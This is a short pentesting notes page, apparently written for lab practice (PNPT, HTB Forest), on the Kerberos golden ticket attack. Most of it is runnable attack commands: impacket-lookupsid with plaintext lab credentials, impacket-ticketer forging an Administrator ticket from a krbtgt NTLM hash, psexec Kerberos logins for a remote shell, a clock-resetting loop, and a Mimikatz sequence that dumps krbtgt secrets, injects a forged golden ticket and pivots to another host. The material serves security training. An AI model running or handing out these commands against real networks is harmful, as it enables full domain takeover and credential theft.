Golden Ticket Attack

Overview

When we compromise the krbtgt account, we will own the domain and be able to grant tickets however we want to. This allows us complete access to every machine in the domain.

We can use Mimikatz on the Domain Controller to pull this attack off

Golden Ticket Attack via Ticketer

First get domain sid (inside of DC shell)

impacket-lookupsid pnpt.local/adot:'texas'@192.168.1.10

impacket-ticketer -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>

impacket-ticketer -nthash '819af826bb148e603acb0f33d17632f8' -domain-sid S-1-5-21-3072663084-364016917-1341370565 -domain htb.local Administrator
export KRB5CCNAME=Administrator.ccache

Add the domain, hostnames etc to /etc/hosts file

impacket-psexec htb.local/administrator@forest -k -no-pass

You might have to change time for Kerberos to accept it

From nmap scan
sudo for i in $(seq 00 24); do sudo date -s $i:36:00; impacket-psexec htb.local/[email protected] -k -no-pass; done
sudo date -s 21:36:00

Resource

Golden Ticket Attack via Mimikatz

In the Domain Controller shell

mimikatz.exe
privilege::debug                
sekurlsa::lsa /inject /name:krbtgt
Note down the SID and NTLM hash of krbtgt account
kerberos::golden /user:Administrator /domain:PNPT.local /sid:5-1-5-21--XXX /krbtgt:11f843XXX /id:500 /ptt
misc::cmd                 
psexec \\DESKTOP-ILG11 cmd.exe
PreviousDumping the NTDS.ditNextShadow Copies

Last updated